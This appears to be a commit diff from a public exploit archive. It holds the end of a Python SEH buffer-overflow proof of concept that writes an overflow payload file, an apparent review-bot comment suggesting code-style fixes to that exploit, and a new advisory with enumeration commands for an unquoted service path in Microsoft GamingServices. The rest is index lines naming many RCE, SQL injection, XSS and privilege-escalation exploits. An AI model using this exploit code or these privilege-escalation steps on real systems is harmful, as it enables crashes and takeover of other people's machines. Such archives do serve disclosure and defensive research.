| 42424242 *** CORRUPT ENTRY *** |
| |
| EIP : 43434343 |
|----------------------------------|
'''
nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
try:
f=open("payload.txt","w")
print("[+] Creating %s bytes payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
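Review bot: The bare `except:` around the file write catches every exception, including `KeyboardInterrupt` and `SystemExit`, and discards the reason, so a permissions problem prints only `File cannot be created.`; narrow it and report the cause, e.g. `except OSError as e:` followed by `print("File cannot be created: %s" % e)`. Using `with open("payload.txt", "w") as f:` also removes the explicit `f.close()` and guarantees the handle is released if the write fails. The header `# Tested on:` lists three Windows builds but does not say which one produced the SEH chain shown in the docstring.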


@ -0,0 +1,42 @@
# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-12-2020
# Vendor Homepage: https://www.microsoft.com
# Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab
# Tested Version: 2.47.10001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
GamingServices GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto
GamingServicesNet GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto
C:\>sc qc "GamingServicesNet"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServicesNet
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServicesNet
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService
C:\>sc qc "GamingServices"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServices
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServices
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: LocalSystem


@ -11204,6 +11204,7 @@ id,file,description,date,author,type,platform,port
48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
48726,exploits/windows/local/48726.py,"BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)",2020-08-03,"Saeed reza Zamanian",local,windows,
48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
@ -11233,6 +11234,7 @@ id,file,description,date,author,type,platform,port
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
49214,exploits/windows/local/49214.txt,"Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path",2020-12-08,"Ismael Nava",local,windows,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
@ -11266,6 +11268,7 @@ id,file,description,date,author,type,platform,port
49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,
49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
49572,exploits/linux/local/49572.txt,"Apport 2.20 - Local Privilege Escalation",2021-02-18,Gr33nh4t,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43388,6 +43391,7 @@ id,file,description,date,author,type,platform,port
48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,
48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,
48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
@ -43512,7 +43516,7 @@ id,file,description,date,author,type,platform,port
49235,exploits/jsp/webapps/49235.txt,"Openfire 4.6.0 - 'sql' Stored XSS",2020-12-11,j5s,webapps,jsp,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,
49237,exploits/java/webapps/49237.txt,"Jenkins 2.235.3 - 'Description' Stored XSS",2020-12-11,gx1,webapps,java,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE",2020-12-11,coiffeur,webapps,php,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,
49239,exploits/php/webapps/49239.txt,"Supply Chain Management System - Auth Bypass SQL Injection",2020-12-11,"Piyush Malviya",webapps,php,
49240,exploits/php/webapps/49240.py,"Dolibarr 12.0.3 - SQLi to RCE",2020-12-11,coiffeur,webapps,php,
49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
@ -43740,6 +43744,7 @@ id,file,description,date,author,type,platform,port
49534,exploits/php/webapps/49534.txt,"YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery",2021-02-08,"numan türle",webapps,php,
49536,exploits/windows/webapps/49536.txt,"Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49537,exploits/windows/webapps/49537.txt,"Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,
49539,exploits/php/webapps/49539.txt,"WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49540,exploits/php/webapps/49540.txt,"WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49542,exploits/php/webapps/49542.txt,"WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
@ -43760,3 +43765,4 @@ id,file,description,date,author,type,platform,port
49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,
49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
